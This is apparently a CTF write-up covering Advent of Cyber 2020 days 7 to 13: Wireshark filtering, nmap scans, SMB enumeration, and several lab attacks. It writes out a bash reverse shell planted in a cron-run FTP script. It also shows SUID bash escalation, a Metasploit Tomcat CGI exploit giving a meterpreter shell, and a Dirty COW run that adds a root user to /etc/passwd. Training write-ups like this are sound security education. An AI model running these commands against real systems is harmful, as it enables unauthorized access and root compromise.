Sine the first post already is getting very long, I am splitting the Writeup up into multiple posts, grouped by topic.

You can already read the web exploitation part.

Day 7 – The Grinch Really Did Steal Christmas

For this challenge we do not need the attack box. We download the pcaps and if we do not already have wireshark installed, we will have to get that too.

For the first task, we open up the first pcap and put ICMP into the filter bar to only see ICMP pakets.

To see only the http get requests, we use the filter again. We filter for the http get mehod with http.request.method == GET.

For the next question we filter for the requested ip and the http GET method with ip.addr == 10.10.67.199 && http.request

Looking through the requests should give us a good hint of what article he was searching for.

Next we open up the second pcap and utilize the filter once more. ftp should filter the requests down enough.

To find the encrypted protocol, we can sort by protocol and scroll through them. That should give a quick find.

For the last task we open up the third pcap. HTTP is a protocol often used for file transfer, so we filter for that.

Then we select the response and go to File->Export Objects->HTTP. In the next dialog we can select the .zip file.

In that zip we will find the wishlist and with it the final answer.

Day 8 – What’s Under the Christmas Tree?

For this day we are back to our beloved attack box. Deploy that and the challenge. While that is loading, spend some time to google for the first question. Wikipedia is a good source for the answer 😉

Now we scan the deployed box with nmap.

nmap 10.10.82.53

Starting Nmap 7.60 ( https://nmap.org ) at 2020-12-13 00:57 GMT
Nmap scan report for ip-10-10-82-53.eu-west-1.compute.internal (10.10.82.53)
Host is up (0.0012s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE
80/tcp   open  http
2222/tcp open  EtherNetIP-1
3389/tcp open  ms-wbt-server
MAC Address: 02:A3:D0:DC:D1:2F (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 1.63 seconds

The challange wants us to experiemtn a bit with the -Pn, -sV and -A flag and we do so. This should help us find the OS of the system, too.

I do like to add a -v for more verbose output to my nmap scans.

nmap -sV -v 10.10.82.53

Starting Nmap 7.60 ( https://nmap.org ) at 2020-12-13 01:01 GMT
NSE: Loaded 42 scripts for scanning.
Initiating ARP Ping Scan at 01:01
Scanning 10.10.82.53 [1 port]
Completed ARP Ping Scan at 01:01, 0.22s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 01:01
Completed Parallel DNS resolution of 1 host. at 01:01, 0.00s elapsed
Initiating SYN Stealth Scan at 01:01
Scanning ip-10-10-82-53.eu-west-1.compute.internal (10.10.82.53) [1000 ports]
Discovered open port 3389/tcp on 10.10.82.53
Discovered open port 80/tcp on 10.10.82.53
Discovered open port 2222/tcp on 10.10.82.53
Completed SYN Stealth Scan at 01:01, 1.25s elapsed (1000 total ports)
Initiating Service scan at 01:01
Scanning 3 services on ip-10-10-82-53.eu-west-1.compute.internal (10.10.82.53)
Completed Service scan at 01:02, 6.04s elapsed (3 services on 1 host)
NSE: Script scanning 10.10.82.53.
Initiating NSE at 01:02
Completed NSE at 01:02, 0.01s elapsed
Initiating NSE at 01:02
Completed NSE at 01:02, 0.00s elapsed
Nmap scan report for ip-10-10-82-53.eu-west-1.compute.internal (10.10.82.53)
Host is up (0.0017s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Apache httpd 2.4.29 ((Ubuntu))
2222/tcp open  ssh           OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
3389/tcp open  ms-wbt-server xrdp
MAC Address: 02:A3:D0:DC:D1:2F (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.96 seconds
           Raw packets sent: 1002 (44.072KB) | Rcvd: 1237 (52.535KB)

For the next task, we are supposed to run the http.title scrip. But that scrip already was part of our experiments with -A

This gives us enough information to finish the day. But there are quite a few Easter eggs hidden in this day and you really should take the opportunity to play around a bit with nmap here.

Day 9 – Anyone can be Santa!

Today is all about FTP so let’s get the attack box and the challenge deployed.

First we connect to the server via ftp and have a look. We don’t have credential yet so we go with anonymous. With ls we can list the directories content, just like we do in the terminal.

There is only one folder we can access as anonymous. We use cd to change into it, then ls again to see the content.

There are two files and we can download them to our attack box with get filename. In our local filesystem we open up the shopping list first and answer question 3.

Now it is time to open up the script in an editor.

#!/bin/bash

# Created by ElfMcEager to backup all of Santa's goodies!

# Create backups to include date DD/MM/YYYY
filename="backup_`date +%d`_`date +%m`_`date +%Y`.tar.gz";

# Backup FTP folder and store in elfmceager's home directory
tar -zcvf /home/elfmceager/$filename /opt/ftp

# TO-DO: Automate transfer of backups to backup server

It is a Backup script that absolutely should not be in the public folder. We even have permissions to upload in that folder.

We replace it with

#!/bin/bash
bash -i >& /dev/tcp/10.10.214.41/4444 0>&1

, a simple bash reverse shell, to the script and save it. The IP in there needs to be your attack box IP not the one from the challenge.

Before we upload the modified script, we need to set up a listener for our reverse shell. nc -lvnp 4444 does the trick.

Now we can upload the scrip with put in ftp.

After a minute or two, we should get a connection on our listener.

With cat /root/flag.txt we read our final flag.

Day 10: Don’t be so sElfish

As always we deploy attack box and the challenge. First we run enum4linux with -U to enumerate users.

root@ip-10-10-214-41:~/Desktop/Tools/Miscellaneous# ./enum4linux.pl -U 10.10.180.212
WARNING: polenum.py is not in your path.  Check that package is installed and your PATH is sane.
WARNING: ldapsearch is not in your path.  Check that package is installed and your PATH is sane.
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Dec 13 09:41:50 2020

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 10.10.180.212
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ===================================================== 
|    Enumerating Workgroup/Domain on 10.10.180.212    |
 ===================================================== 
[+] Got domain/workgroup name: TBFC-SMB-01

 ====================================== 
|    Session Check on 10.10.180.212    |
 ====================================== 
[+] Server 10.10.180.212 allows sessions using username '', password ''

 ============================================ 
|    Getting domain SID for 10.10.180.212    |
 ============================================ 
Domain Name: TBFC-SMB-01
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

 ============================== 
|    Users on 10.10.180.212    |
 ============================== 
index: 0x1 RID: 0x3e8 acb: 0x00000010 Account: elfmcskidy    Name:   Desc: 
index: 0x2 RID: 0x3ea acb: 0x00000010 Account: elfmceager    Name: elfmceagerDesc: 
index: 0x3 RID: 0x3e9 acb: 0x00000010 Account: elfmcelferson    Name:   Desc: 

user:[elfmcskidy] rid:[0x3e8]
user:[elfmceager] rid:[0x3ea]
user:[elfmcelferson] rid:[0x3e9]
enum4linux complete on Sun Dec 13 09:41:51 2020

This gives us the users. Now we also enumerate the shares:

root@ip-10-10-214-41:~/Desktop/Tools/Miscellaneous# ./enum4linux.pl -S 10.10.180.212
WARNING: polenum.py is not in your path.  Check that package is installed and your PATH is sane.
WARNING: ldapsearch is not in your path.  Check that package is installed and your PATH is sane.
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Dec 13 09:45:10 2020

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 10.10.180.212
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ===================================================== 
|    Enumerating Workgroup/Domain on 10.10.180.212    |
 ===================================================== 
[+] Got domain/workgroup name: TBFC-SMB-01

 ====================================== 
|    Session Check on 10.10.180.212    |
 ====================================== 
[+] Server 10.10.180.212 allows sessions using username '', password ''

 ============================================ 
|    Getting domain SID for 10.10.180.212    |
 ============================================ 
Domain Name: TBFC-SMB-01
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

 ========================================== 
|    Share Enumeration on 10.10.180.212    |
 ========================================== 
WARNING: The "syslog" option is deprecated

    Sharename       Type      Comment
    ---------       ----      -------
    tbfc-hr         Disk      tbfc-hr
    tbfc-it         Disk      tbfc-it
    tbfc-santa      Disk      tbfc-santa
    IPC$            IPC       IPC Service (tbfc-smb server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.

    Server               Comment
    ---------            -------

    Workgroup            Master
    ---------            -------
    TBFC-SMB-01          TBFC-SMB

[+] Attempting to map shares on 10.10.180.212
//10.10.180.212/tbfc-hr    Mapping: DENIED, Listing: N/A
//10.10.180.212/tbfc-it    Mapping: DENIED, Listing: N/A
//10.10.180.212/tbfc-santa    Mapping: OK, Listing: OK
//10.10.180.212/IPC$    [E] Can't understand response:
WARNING: The "syslog" option is deprecated
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
enum4linux complete on Sun Dec 13 09:45:11 2020

The output shows us that tbfc-santa courld be mapped. Let’s try to log into this share with no password. With dir we list the content and should have all information to finish the tasks.

Day 11 – The Rogue Gnome

We start up the attack box and challenge. While they boot we read the documentation in the challenge and answer the first two questions.

The we SSH into the box with the provided credentials. ssh cmnatic@10.10.154.38. On the first connect, you will have to confirm the servers fingerprint.

With find / -perm -u=s -type f 2>/dev/null we search for binaries that have the SUID bit set. Meaning they can be executed with the permission of a different user.

-bash-4.4$ find / -perm -u=s -type f 2>/dev/null
/bin/umount
/bin/mount
/bin/su
/bin/fusermount
/bin/bash
/bin/ping
/snap/core/10444/bin/mount
/snap/core/10444/bin/ping
/snap/core/10444/bin/ping6
/snap/core/10444/bin/su
/snap/core/10444/bin/umount
/snap/core/10444/usr/bin/chfn
/snap/core/10444/usr/bin/chsh
/snap/core/10444/usr/bin/gpasswd
/snap/core/10444/usr/bin/newgrp
/snap/core/10444/usr/bin/passwd
/snap/core/10444/usr/bin/sudo
/snap/core/10444/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/10444/usr/lib/openssh/ssh-keysign
/snap/core/10444/usr/lib/snapd/snap-confine
/snap/core/10444/usr/sbin/pppd
/snap/core/7270/bin/mount
/snap/core/7270/bin/ping
/snap/core/7270/bin/ping6
/snap/core/7270/bin/su
/snap/core/7270/bin/umount
/snap/core/7270/usr/bin/chfn
/snap/core/7270/usr/bin/chsh
/snap/core/7270/usr/bin/gpasswd
/snap/core/7270/usr/bin/newgrp
/snap/core/7270/usr/bin/passwd
/snap/core/7270/usr/bin/sudo
/snap/core/7270/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/7270/usr/lib/openssh/ssh-keysign
/snap/core/7270/usr/lib/snapd/snap-confine
/snap/core/7270/usr/sbin/pppd
/usr/bin/newgidmap
/usr/bin/at
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/pkexec
/usr/bin/newuidmap
/usr/bin/traceroute6.iputils
/usr/bin/chsh
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/snapd/snap-confine

/bin/bash looks liek a very prmising candidate. Let#s check the permissions.

-bash-4.4$ ls -la /bin/bash 
-rwsr-xr-x 1 root root 1113504 Jun  6  2019 /bin/bash
-bash-4.4$

Looks like it can be run as root. We will do just that with bash -p

Now we can cat the flag file.

Day 12: Ready, set, elf.

After deploying the boxes we run a quick nmap scan to get an overview:

root@ip-10-10-214-41:~# nmap -sV -v 10.10.83.199

Starting Nmap 7.60 ( https://nmap.org ) at 2020-12-13 10:24 GMT
NSE: Loaded 42 scripts for scanning.
Initiating ARP Ping Scan at 10:24
Scanning 10.10.83.199 [1 port]
Completed ARP Ping Scan at 10:24, 0.22s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 10:24
Completed Parallel DNS resolution of 1 host. at 10:24, 0.00s elapsed
Initiating SYN Stealth Scan at 10:24
Scanning ip-10-10-83-199.eu-west-1.compute.internal (10.10.83.199) [1000 ports]
Discovered open port 8080/tcp on 10.10.83.199
Discovered open port 3389/tcp on 10.10.83.199
Discovered open port 8009/tcp on 10.10.83.199
Increasing send delay for 10.10.83.199 from 0 to 5 due to 11 out of 27 dropped probes since last increase.
Completed SYN Stealth Scan at 10:24, 20.25s elapsed (1000 total ports)
Initiating Service scan at 10:24
Scanning 3 services on ip-10-10-83-199.eu-west-1.compute.internal (10.10.83.199)
Completed Service scan at 10:25, 13.88s elapsed (3 services on 1 host)
NSE: Script scanning 10.10.83.199.
Initiating NSE at 10:25
Completed NSE at 10:25, 0.30s elapsed
Initiating NSE at 10:25
Completed NSE at 10:25, 0.00s elapsed
Nmap scan report for ip-10-10-83-199.eu-west-1.compute.internal (10.10.83.199)
Host is up (0.011s latency).
Not shown: 997 filtered ports
PORT     STATE SERVICE       VERSION
3389/tcp open  ms-wbt-server Microsoft Terminal Services
8009/tcp open  ajp13         Apache Jserv (Protocol v1.3)
8080/tcp open  http-proxy
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8080-TCP:V=7.60%I=7%D=12/13%Time=5FD5EBF5%P=x86_64-pc-linux-gnu%r(G
SF:etRequest,2000,"HTTP/1\.1\x20200\x20\r\nContent-Type:\x20text/html;char
SF:set=UTF-8\r\nDate:\x20Sun,\x2013\x20Dec\x202020\x2010:24:53\x20GMT\r\nC
SF:onnection:\x20close\r\n\r\n\r\n\r\n\r\n<!DOCTYPE\x20html>\r\n<html\x20l
SF:ang=\"en\">\r\n\x20\x20\x20\x20<head>\r\n\x20\x20\x20\x20\x20\x20\x20\x
SF:20<meta\x20charset=\"UTF-8\"\x20/>\r\n\x20\x20\x20\x20\x20\x20\x20\x20<
SF:title>Apache\x20Tomcat/9\.0\.17</title>\r\n\x20\x20\x20\x20\x20\x20\x20
SF:\x20<link\x20href=\"favicon\.ico\"\x20rel=\"icon\"\x20type=\"image/x-ic
SF:on\"\x20/>\r\n\x20\x20\x20\x20\x20\x20\x20\x20<link\x20href=\"favicon\.
SF:ico\"\x20rel=\"shortcut\x20icon\"\x20type=\"image/x-icon\"\x20/>\r\n\x2
SF:0\x20\x20\x20\x20\x20\x20\x20<link\x20href=\"tomcat\.css\"\x20rel=\"sty
SF:lesheet\"\x20type=\"text/css\"\x20/>\r\n\x20\x20\x20\x20</head>\r\n\r\n
SF:\x20\x20\x20\x20<body>\r\n\x20\x20\x20\x20\x20\x20\x20\x20<div\x20id=\"
SF:wrapper\">\r\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<div\x20i
SF:d=\"navigation\"\x20class=\"curved\x20container\">\r\n\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<span\x20id=\"nav-home\"
SF:><a\x20href=\"https://tomcat\.apache\.org/\">Home</a></span>\r\n\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<span\x20id=\"
SF:nav-hosts\"><a\x20href=\"/docs/\">Documentation</a></span>\r\n\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<span\x20id=\"na
SF:v-config\"><a\x20href=\"/docs/config/\">Configuration</a></span>\r\n\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<span\x20i
SF:d=\"nav-examples\"><a\x20href=\"/examples/\">Examples")%r(HTTPOptions,7
SF:D,"HTTP/1\.1\x20200\x20\r\nAllow:\x20GET,\x20HEAD,\x20POST,\x20OPTIONS\
SF:r\nContent-Length:\x200\r\nDate:\x20Sun,\x2013\x20Dec\x202020\x2010:24:
SF:54\x20GMT\r\nConnection:\x20close\r\n\r\n")%r(RTSPRequest,8CB,"HTTP/1\.
SF:1\x20505\x20\r\nContent-Type:\x20text/html;charset=utf-8\r\nContent-Lan
SF:guage:\x20en\r\nContent-Length:\x202114\r\nDate:\x20Sun,\x2013\x20Dec\x
SF:202020\x2010:24:54\x20GMT\r\n\r\n<!doctype\x20html><html\x20lang=\"en\"
SF:><head><title>HTTP\x20Status\x20505\x20\xe2\x80\x93\x20HTTP\x20Version\
SF:x20Not\x20Supported</title><style\x20type=\"text/css\">h1\x20{font-fami
SF:ly:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-si
SF:ze:22px;}\x20h2\x20{font-family:Tahoma,Arial,sans-serif;color:white;bac
SF:kground-color:#525D76;font-size:16px;}\x20h3\x20{font-family:Tahoma,Ari
SF:al,sans-serif;color:white;background-color:#525D76;font-size:14px;}\x20
SF:body\x20{font-family:Tahoma,Arial,sans-serif;color:black;background-col
SF:or:white;}\x20b\x20{font-family:Tahoma,Arial,sans-serif;color:white;bac
SF:kground-color:#525D76;}\x20p\x20{font-family:Tahoma,Arial,sans-serif;ba
SF:ckground:white;color:black;font-size:12px;}\x20a\x20{color:black;}\x20a
SF:\.name\x20{color:black;}\x20\.line\x20{height:1px;background-color:#525
SF:D76;border:none;}</style></head><body><h");
MAC Address: 02:34:E1:B1:70:6F (Unknown)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.07 seconds
           Raw packets sent: 3011 (132.468KB) | Rcvd: 20 (872B)

Looks like there is a webserver running on port 8080. Let’s look at it by pulling it up in the browser.

Here we can see what version of tomcat is running. Now we start metasploit with msfconsole

search tomcat list a number of explots metasploit provides for tomcat. info path allows us to view the details of an explot.

The one that seems promising is info exploit/windows/http/tomcat_cgi_cmdlineargs

msf5 > info exploit/windows/http/tomcat_cgi_cmdlineargs

       Name: Apache Tomcat CGIServlet enableCmdLineArguments Vulnerability
     Module: exploit/windows/http/tomcat_cgi_cmdlineargs
   Platform: Windows
       Arch: x86, x64
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2019-04-10

Provided by:
  Yakov Shafranovich
  sinn3r <sinn3r@metasploit.com>

Module side effects:
 ioc-in-logs
 artifacts-on-disk

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
  Id  Name
  --  ----
  0   Apache Tomcat 9.0 or prior for Windows

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      8080             yes       The target port (TCP)
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
  TARGETURI  /                yes       The URI path to CGI script
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  This module exploits a vulnerability in Apache Tomcat's CGIServlet 
  component. When the enableCmdLineArguments setting is set to true, a 
  remote user can abuse this to execute system commands, and gain 
  remote code execution.

References:
  https://cvedetails.com/cve/CVE-2019-0232/
  
Remote Code Execution (RCE) in CGI Servlet – Apache Tomcat on Windows – CVE-2019-0232

  https://blog.trendmicro.com/trendlabs-security-intelligence/uncovering-cve-2019-0232-a-remote-code-execution-vulnerability-in-apache-tomcat/

We select it with use exploit/windows/http/tomcat_cgi_cmdlineargs

options shows us the available settings for this exploit. First we double check that LHOST is our attack box IP.

Then we set the RHOST to the servers IP. set RHOST 10.10.83.199

Now we need a file in the cgi folder. Following the challenge description we can find http://10.10.83.199:8080/cgi-bin/elfwhacker.bat We use set TARGETURI /cgi-bin/elfwhacker.bat and doube check our options.

When everything is fine, we issue exploit to start the attack.

We are now in a meterpreter session on the server. with dir we can list the directory content.

meterpreter > dir
Listing: C:\Program Files\Apache Software Foundation\Tomcat 9.0\webapps\ROOT\WEB-INF\cgi-bin
============================================================================================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100777/rwxrwxrwx  73802  fil   2020-12-13 10:56:07 +0000  cyGMM.exe
100777/rwxrwxrwx  825    fil   2020-11-19 03:49:25 +0000  elfwhacker.bat
100666/rw-rw-rw-  27     fil   2020-11-19 22:05:43 +0000  flag1.txt

We can cat the flad file ad finish the challenge. There is more to explore here and you should use the opportunity to play around with metasploit and privilege escalation.

Day 13: Coal For Christmas

As always, hit the deploy buttons. Once everything is booted up, we run a quick nmap scan.

root@ip-10-10-224-179:~# nmap 10.10.34.134

Starting Nmap 7.60 ( https://nmap.org ) at 2020-12-14 10:58 GMT
Nmap scan report for ip-10-10-34-134.eu-west-1.compute.internal (10.10.34.134)
Host is up (0.00082s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
23/tcp  open  telnet
111/tcp open  rpcbind
MAC Address: 02:91:2C:86:CD:15 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 3.04 seconds

Telnet is a insecure predecessor of ssh. So lets connect with telnet 10.10.34.134 23. Luckily for us, we are provided with cenential in the greeting text.

First thing we do is getting a idea of what system we are dealing with.

$ uname -a
Linux christmas 3.2.0-23-generic #36-Ubuntu SMP Tue Apr 10 20:39:51 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux
$ cat /etc/*release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=12.04
DISTRIB_CODENAME=precise
DISTRIB_DESCRIPTION="Ubuntu 12.04 LTS"

With ls we have a look at what files we have in our hom folder.

$ ls
christmas.sh  cookies_and_milk.txt

Looking at cookies_and_milk.txt we will be able to answer Question of who got there first.

The challenge asks us to learn about DirtyCow. Let’s do that.

On the site you can find a link to the code of the Dirty Cow explot. To get the code of the box, I create a new file with nano dirty.c and copy paste the source. CTRL+O saves the file, CTRL+X closes the editor.

In the comment header of the sourcecode we just copied, it is explained how to complile the exploit. So lets do that with gcc -pthread dirty.c -o dirty -lcrypt.

Now we run the explot. In my case, I went for the absolutely insecure password of foo when prompted.

$ ./dirty
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: 
Complete line:
firefart:fiIoY9ux7Hzpc:0:0:pwned:/root:/bin/bash

mmap: 7f9ccb251000
madvise 0

ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password 'foo'.


DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password 'foo'.


DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd

With su firefart we change what user we are running as. cd ~ brings us to the home of firefart. In there we find message_from_the_grinch.txt.

firefart@christmas:~# cat message_from_the_grinch.txt
Nice work, Santa!

Wow, this house sure was DIRTY!
I think they deserve coal for Christmas, don't you?
So let's leave some coal under the Christmas `tree`!

Let's work together on this. Leave this text file here,
and leave the christmas.sh script here too...
but, create a file named `coal` in this directory!
Then, inside this directory, pipe the output
of the `tree` command into the `md5sum` command.

The output of that command (the hash itself) is
the flag you can submit to complete this task
for the Advent of Cyber!

    - Yours,
        John Hammond
        er, sorry, I mean, the Grinch

      - THE GRINCH, SERIOUSLY

Following the instructions we use touch coal to create the coal file, then run tree | md5sum to get the final answer.